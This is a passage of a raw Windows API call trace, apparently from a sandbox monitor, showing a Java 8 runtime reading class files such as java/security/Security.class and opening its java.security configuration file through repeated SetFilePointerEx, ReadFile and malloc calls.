(_Size=0x24) returned 0x12221ae0 [0104.308] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a06f05, lpNewFilePointer=0x208c0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0d0*=27291397) returned 1 [0104.308] ReadFile (in: hFile=0x134, lpBuffer=0x208c120, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c0a0, lpOverlapped=0x0 | out: lpBuffer=0x208c120*, lpNumberOfBytesRead=0x208c0a0*=0x1e, lpOverlapped=0x0) returned 1 [0104.308] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a06f46, lpNewFilePointer=0x208c130, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c130*=27291462) returned 1 [0104.308] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x3bb, lpNumberOfBytesRead=0x208c100, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c100*=0x3bb, lpOverlapped=0x0) returned 1 [0104.338] malloc (_Size=0x48) returned 0x1228e5a0 [0104.339] malloc (_Size=0xa0) returned 0x122ea270 [0104.339] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3349f28, lpNewFilePointer=0x208c460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c460*=53780264) returned 1 [0104.339] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c430, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c430*=0xa0, lpOverlapped=0x0) returned 1 [0104.339] malloc (_Size=0x27) returned 0x12221ea0 [0104.339] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a07704, lpNewFilePointer=0x208c060, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c060*=27293444) returned 1 [0104.339] ReadFile (in: hFile=0x134, lpBuffer=0x208c0b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c030, lpOverlapped=0x0 | out: lpBuffer=0x208c0b0*, lpNumberOfBytesRead=0x208c030*=0x1e, lpOverlapped=0x0) returned 1 [0104.339] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a07748, lpNewFilePointer=0x208c0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0c0*=27293512) returned 1 [0104.339] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1a2, lpNumberOfBytesRead=0x208c090, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208c090*=0x1a2, lpOverlapped=0x0) returned 1 [0104.340] malloc (_Size=0x48) returned 0x1228e870 [0104.340] malloc (_Size=0xa0) returned 0x122ea270 [0104.340] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3347fdd, lpNewFilePointer=0x208bfd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfd0*=53772253) returned 1 [0104.340] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bfa0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208bfa0*=0xa0, lpOverlapped=0x0) returned 1 [0104.340] malloc (_Size=0x1c) returned 0x12221ae0 [0104.341] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f0aff, lpNewFilePointer=0x208bbd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbd0*=27200255) returned 1 [0104.341] ReadFile (in: hFile=0x134, lpBuffer=0x208bc20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bba0, lpOverlapped=0x0 | out: lpBuffer=0x208bc20*, lpNumberOfBytesRead=0x208bba0*=0x1e, lpOverlapped=0x0) returned 1 [0104.343] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f0b38, lpNewFilePointer=0x208bc30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc30*=27200312) returned 1 [0104.343] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0xac8, lpNumberOfBytesRead=0x208bc00, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208bc00*=0xac8, lpOverlapped=0x0) returned 1 [0104.345] malloc (_Size=0x48) returned 0x1228eeb0 [0104.345] malloc (_Size=0xa0) returned 0x122ea270 [0104.345] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3349c94, lpNewFilePointer=0x208c2a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2a0*=53779604) returned 1 [0104.345] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c270, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c270*=0xa0, lpOverlapped=0x0) returned 1 [0104.345] malloc (_Size=0x25) returned 0x12221ea0 [0104.345] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a05cce, lpNewFilePointer=0x208bea0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bea0*=27286734) returned 1 [0104.345] ReadFile (in: hFile=0x134, lpBuffer=0x208bef0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208be70, lpOverlapped=0x0 | out: lpBuffer=0x208bef0*, lpNumberOfBytesRead=0x208be70*=0x1e, lpOverlapped=0x0) returned 1 [0104.345] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a05d10, lpNewFilePointer=0x208bf00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf00*=27286800) returned 1 [0104.346] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x318, lpNumberOfBytesRead=0x208bed0, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208bed0*=0x318, lpOverlapped=0x0) returned 1 [0104.347] malloc (_Size=0x48) returned 0x1228e870 [0104.347] malloc (_Size=0xa0) returned 0x122ea270 [0104.347] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3348711, lpNewFilePointer=0x208c430, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c430*=53774097) returned 1 [0104.347] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c400, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c400*=0xa0, lpOverlapped=0x0) returned 1 [0104.347] malloc (_Size=0x29) returned 0x12299000 [0104.347] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f865d, lpNewFilePointer=0x208c030, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c030*=27231837) returned 1 [0104.347] ReadFile (in: hFile=0x134, lpBuffer=0x208c080, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c000, lpOverlapped=0x0 | out: lpBuffer=0x208c080*, lpNumberOfBytesRead=0x208c000*=0x1e, lpOverlapped=0x0) returned 1 [0104.377] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f86a3, lpNewFilePointer=0x208c090, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c090*=27231907) returned 1 [0104.377] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x240, lpNumberOfBytesRead=0x208c060, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208c060*=0x240, lpOverlapped=0x0) returned 1 [0104.378] malloc (_Size=0x48) returned 0x1228e5a0 [0104.379] malloc (_Size=0xa0) returned 0x122ea270 [0104.379] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33486bf, lpNewFilePointer=0x208c430, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c430*=53774015) returned 1 [0104.379] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c400, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c400*=0xa0, lpOverlapped=0x0) returned 1 [0104.379] malloc (_Size=0x25) returned 0x12221ea0 [0104.379] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f805c, lpNewFilePointer=0x208c030, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c030*=27230300) returned 1 [0104.379] ReadFile (in: hFile=0x134, lpBuffer=0x208c080, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c000, lpOverlapped=0x0 | out: lpBuffer=0x208c080*, lpNumberOfBytesRead=0x208c000*=0x1e, lpOverlapped=0x0) returned 1 [0104.379] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f809e, lpNewFilePointer=0x208c090, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c090*=27230366) returned 1 [0104.379] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x5bf, lpNumberOfBytesRead=0x208c060, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c060*=0x5bf, lpOverlapped=0x0) returned 1 [0104.380] malloc (_Size=0x48) returned 0x1228e190 [0104.380] malloc (_Size=0xa0) returned 0x122ea270 [0104.380] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e246c, lpNewFilePointer=0x208cb40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb40*=54404204) returned 1 [0104.381] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cb10, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208cb10*=0xa0, lpOverlapped=0x0) returned 1 [0104.381] malloc (_Size=0x37) returned 0x12298b80 [0104.381] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2930879, lpNewFilePointer=0x208c740, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c740*=43190393) returned 1 [0104.381] ReadFile (in: hFile=0x134, lpBuffer=0x208c790, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c710, lpOverlapped=0x0 | out: lpBuffer=0x208c790*, lpNumberOfBytesRead=0x208c710*=0x1e, lpOverlapped=0x0) returned 1 [0104.381] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29308cd, lpNewFilePointer=0x208c7a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7a0*=43190477) returned 1 [0104.381] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x307, lpNumberOfBytesRead=0x208c770, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c770*=0x307, lpOverlapped=0x0) returned 1 [0104.383] strlen (_Str="java/security/Security.class") returned 0x1c [0104.383] malloc (_Size=0x48) returned 0x1228ed20 [0104.383] malloc (_Size=0xa0) returned 0x122ea270 [0104.383] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f2565, lpNewFilePointer=0x208bc30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc30*=54469989) returned 1 [0104.383] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bc00, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208bc00*=0xa0, lpOverlapped=0x0) returned 1 [0104.383] malloc (_Size=0x1d) returned 0x12221ea0 [0104.383] strlen (_Str="java/security/Security.class") returned 0x1c [0104.383] strcpy (in: _Dest=0x208bdb0, _Source="java/security/Security.class" | out: _Dest="java/security/Security.class") returned="java/security/Security.class" [0104.383] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b43fbf, lpNewFilePointer=0x208b830, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b830*=45367231) returned 1 [0104.383] ReadFile (in: hFile=0x134, lpBuffer=0x208b880, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b800, lpOverlapped=0x0 | out: lpBuffer=0x208b880*, lpNumberOfBytesRead=0x208b800*=0x1e, lpOverlapped=0x0) returned 1 [0104.385] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b43ff9, lpNewFilePointer=0x208b890, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b890*=45367289) returned 1 [0104.385] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x33b4, lpNumberOfBytesRead=0x208b860, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208b860*=0x33b4, lpOverlapped=0x0) returned 1 [0104.387] free (_Block=0x12298b80) [0104.388] free (_Block=0x1228e190) [0104.400] strlen (_Str="java/security/Security$1.class") returned 0x1e [0104.400] malloc (_Size=0x48) returned 0x1228e870 [0104.400] malloc (_Size=0xa0) returned 0x122ea270 [0104.400] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f2519, lpNewFilePointer=0x208b5b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5b0*=54469913) returned 1 [0104.400] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b580, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208b580*=0xa0, lpOverlapped=0x0) returned 1 [0104.401] malloc (_Size=0x1f) returned 0x12221ae0 [0104.401] strlen (_Str="java/security/Security$1.class") returned 0x1e [0104.401] strcpy (in: _Dest=0x208b730, _Source="java/security/Security$1.class" | out: _Dest="java/security/Security$1.class") returned="java/security/Security$1.class" [0104.401] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b43d8f, lpNewFilePointer=0x208b1b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b1b0*=45366671) returned 1 [0104.401] ReadFile (in: hFile=0x134, lpBuffer=0x208b200, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b180, lpOverlapped=0x0 | out: lpBuffer=0x208b200*, lpNumberOfBytesRead=0x208b180*=0x1e, lpOverlapped=0x0) returned 1 [0104.401] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b43dcb, lpNewFilePointer=0x208b210, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b210*=45366731) returned 1 [0104.401] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x1f4, lpNumberOfBytesRead=0x208b1e0, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208b1e0*=0x1f4, lpOverlapped=0x0) returned 1 [0104.402] free (_Block=0x12221ea0) [0104.402] free (_Block=0x1228ed20) [0104.409] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\java.security") returned 0x3d [0104.409] malloc (_Size=0x86) returned 0x122ea300 [0104.409] wcscpy (in: _Dest=0x122ea300, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\java.security" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\java.security") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\java.security" [0104.409] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\java.security", nBufferLength=0x9, lpBuffer=0x208b7c8, lpFilePart=0x208b7c0 | out: lpBuffer="", lpFilePart=0x208b7c0*=0x0) returned 0x3e [0104.409] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\java.security" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\security\\java.security"), fInfoLevelId=0x0, lpFileInformation=0x208b560 | out: lpFileInformation=0x208b560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb48511f, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb48511f, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb48511f, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa680)) returned 1 [0104.415] free (_Block=0x122ea300) [0104.415] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\java.security") returned 0x3d [0104.416] malloc (_Size=0x86) returned 0x122ea300 [0104.416] wcscpy (in: _Dest=0x122ea300, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\java.security" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\java.security") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\java.security" [0104.416] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\java.security" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\security\\java.security"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0104.416] free (_Block=0x122ea300) [0104.418] strlen (_Str="java/util/Properties$LineReader.class") returned 0x25 [0104.418] malloc (_Size=0x48) returned 0x1228e280 [0104.418] malloc (_Size=0xa0) returned 0x122ea270 [0104.418] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415fce, lpNewFilePointer=0x208a7f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a7f0*=54616014) returned 1 [0104.418] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a7c0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208a7c0*=0xa0, lpOverlapped=0x0) returned 1 [0104.421] malloc (_Size=0x26) returned 0x12221ea0 [0104.422] strlen (_Str="java/util/Properties$LineReader.class") returned 0x25 [0104.422] strcpy (in: _Dest=0x208a970, _Source="java/util/Properties$LineReader.class" | out: _Dest="java/util/Properties$LineReader.class") returned="java/util/Properties$LineReader.class" [0104.422] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x307f28f, lpNewFilePointer=0x208a3f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a3f0*=50852495) returned 1 [0104.422] ReadFile (in: hFile=0x134, lpBuffer=0x208a440, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208a3c0, lpOverlapped=0x0 | out: lpBuffer=0x208a440*, lpNumberOfBytesRead=0x208a3c0*=0x1e, lpOverlapped=0x0) returned 1 [0104.425] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x307f2d2, lpNewFilePointer=0x208a450, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a450*=50852562) returned 1 [0104.425] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x633, lpNumberOfBytesRead=0x208a420, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208a420*=0x633, lpOverlapped=0x0) returned 1 [0104.426] free (_Block=0x12221ae0) [0104.426] free (_Block=0x1228e870) [0104.455] ReadFile (in: hFile=0x2c4, lpBuffer=0x2089420, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x20893f0, lpOverlapped=0x0 | out: lpBuffer=0x2089420*, lpNumberOfBytesRead=0x20893f0*=0x2000, lpOverlapped=0x0) returned 1 [0104.467] ReadFile (in: hFile=0x2c4, lpBuffer=0x2089420, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x20893f0, lpOverlapped=0x0 | out: lpBuffer=0x2089420*, lpNumberOfBytesRead=0x20893f0*=0x2000, lpOverlapped=0x0) returned 1 [0104.471] ReadFile (in: hFile=0x2c4, lpBuffer=0x2089420, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x20893f0, lpOverlapped=0x0 | out: lpBuffer=0x2089420*, lpNumberOfBytesRead=0x20893f0*=0x2000, lpOverlapped=0x0) returned 1 [0104.472] ReadFile (in: hFile=0x2c4, lpBuffer=0x2089420, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x20893f0, lpOverlapped=0x0 | out: lpBuffer=0x2089420*, lpNumberOfBytesRead=0x20893f0*=0x2000, lpOverlapped=0x0) returned 1 [0104.474] ReadFile (in: hFile=0x2c4, lpBuffer=0x2089420, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x20893f0, lpOverlapped=0x0 | out: lpBuffer=0x2089420*, lpNumberOfBytesRead=0x20893f0*=0x2000, lpOverlapped=0x0) returned 1 [0104.476] ReadFile (in: hFile=0x2c4, lpBuffer=0x2089420, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x20893f0, lpOverlapped=0x0 | out: lpBuffer=0x2089420*, lpNumberOfBytesRead=0x20893f0*=0x680, lpOverlapped=0x0) returned 1 [0104.476] GetFileType (hFile=0x2c4) returned 0x1 [0104.476] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x208b550, dwMoveMethod=0x1 | out: lpNewFilePointer=0x208b550*=42624) returned 1 [0104.476] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x208b560 | out: lpFileSize=0x208b560*=42624) returned 1 [0104.477] ReadFile (in: hFile=0x2c4, lpBuffer=0x2089420, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x20893f0, lpOverlapped=0x0 | out: lpBuffer=0x2089420*, lpNumberOfBytesRead=0x20893f0*=0x0, lpOverlapped=0x0) returned 1 [0104.478] CloseHandle (hObject=0x2c4) returned 1 [0104.505] strlen (_Str="java/util/ArrayList$SubList.class") returned 0x21 [0104.505] malloc (_Size=0x48) returned 0x1228e460 [0104.505] malloc (_Size=0xa0) returned 0x122ea270 [0104.505] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ef559, lpNewFilePointer=0x208c9e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9e0*=54457689) returned 1 [0104.505] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c9b0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c9b0*=0xa0, lpOverlapped=0x0) returned 1 [0104.506] malloc (_Size=0x22) returned 0x12221ae0 [0104.507] strlen (_Str="java/util/ArrayList$SubList.class") returned 0x21 [0104.507] strcpy (in: _Dest=0x208cb60, _Source="java/util/ArrayList$SubList.class" | out: _Dest="java/util/ArrayList$SubList.class") returned="java/util/ArrayList$SubList.class" [0104.507] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ace102, lpNewFilePointer=0x208c5e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5e0*=44884226) returned 1 [0104.507] ReadFile (in: hFile=0x134, lpBuffer=0x208c630, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c5b0, lpOverlapped=0x0 | out: lpBuffer=0x208c630*, lpNumberOfBytesRead=0x208c5b0*=0x1e, lpOverlapped=0x0) returned 1 [0104.509] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ace141, lpNewFilePointer=0x208c640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c640*=44884289) returned 1 [0104.509] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0xcc4, lpNumberOfBytesRead=0x208c610, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c610*=0xcc4, lpOverlapped=0x0) returned 1 [0104.509] free (_Block=0x12221ea0) [0104.510] free (_Block=0x1228e280) [0104.524] strlen (_Str="java/util/ArrayList$SubList$1.class") returned 0x23 [0104.524] malloc (_Size=0x48) returned 0x1228ef00 [0104.524] malloc (_Size=0xa0) returned 0x122ea270 [0104.524] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ef508, lpNewFilePointer=0x208c8b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8b0*=54457608) returned 1 [0104.524] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c880, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c880*=0xa0, lpOverlapped=0x0) returned 1 [0104.524] malloc (_Size=0x24) returned 0x12221ea0 [0104.526] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2acd693, lpNewFilePointer=0x208c4b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4b0*=44881555) returned 1 [0104.526] ReadFile (in: hFile=0x134, lpBuffer=0x208c500, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c480, lpOverlapped=0x0 | out: lpBuffer=0x208c500*, lpNumberOfBytesRead=0x208c480*=0x1e, lpOverlapped=0x0) returned 1 [0104.532] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2acd6d4, lpNewFilePointer=0x208c510, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c510*=44881620) returned 1 [0104.532] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0xa2e, lpNumberOfBytesRead=0x208c4e0, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c4e0*=0xa2e, lpOverlapped=0x0) returned 1 [0104.533] malloc (_Size=0x48) returned 0x1228e9b0 [0104.533] malloc (_Size=0xa0) returned 0x122ea270 [0104.533] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414ccf, lpNewFilePointer=0x208bdf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bdf0*=54611151) returned 1 [0104.533] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bdc0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208bdc0*=0xa0, lpOverlapped=0x0) returned 1 [0104.534] malloc (_Size=0x1d) returned 0x12221ae0 [0104.534] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3036fc4, lpNewFilePointer=0x208b9f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9f0*=50556868) returned 1 [0104.534] ReadFile (in: hFile=0x134, lpBuffer=0x208ba40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b9c0, lpOverlapped=0x0 | out: lpBuffer=0x208ba40*, lpNumberOfBytesRead=0x208b9c0*=0x1e, lpOverlapped=0x0) returned 1 [0104.542] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3036ffe, lpNewFilePointer=0x208ba50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ba50*=50556926) returned 1 [0104.542] ReadFile (in: hFile=0x134, lpBuffer=0x1227ece0, nNumberOfBytesToRead=0x1d1, lpNumberOfBytesRead=0x208ba20, lpOverlapped=0x0 | out: lpBuffer=0x1227ece0*, lpNumberOfBytesRead=0x208ba20*=0x1d1, lpOverlapped=0x0) returned 1 [0104.545] malloc (_Size=0x48) returned 0x1228efa0 [0104.545] malloc (_Size=0xa0) returned 0x122ea270 [0104.546] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e2d62, lpNewFilePointer=0x208cbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cbb0*=54406498) returned 1 [0104.546] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cb80, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208cb80*=0xa0, lpOverlapped=0x0) returned 1 [0104.546] malloc (_Size=0x41) returned 0x1228eb40 [0104.546] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29457e1, lpNewFilePointer=0x208c7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7b0*=43276257) returned 1 [0104.546] ReadFile (in: hFile=0x134, lpBuffer=0x208c800, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c780, lpOverlapped=0x0 | out: lpBuffer=0x208c800*, lpNumberOfBytesRead=0x208c780*=0x1e, lpOverlapped=0x0) returned 1 [0104.551] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x294583f, lpNewFilePointer=0x208c810, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c810*=43276351) returned 1 [0104.551] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x1af1, lpNumberOfBytesRead=0x208c7e0, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c7e0*=0x1af1, lpOverlapped=0x0) returned 1 [0104.555] malloc (_Size=0x48) returned 0x1228e870 [0104.555] malloc (_Size=0xa0) returned 0x122ea270 [0104.556] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33485cf, lpNewFilePointer=0x208c5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5f0*=53773775) returned 1 [0104.556] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c5c0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c5c0*=0xa0, lpOverlapped=0x0) returned 1 [0104.557] malloc (_Size=0x22) returned 0x12221ae0 [0104.557] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f6d57, lpNewFilePointer=0x208c1f0, dwMoveMethod=0x0 | out: 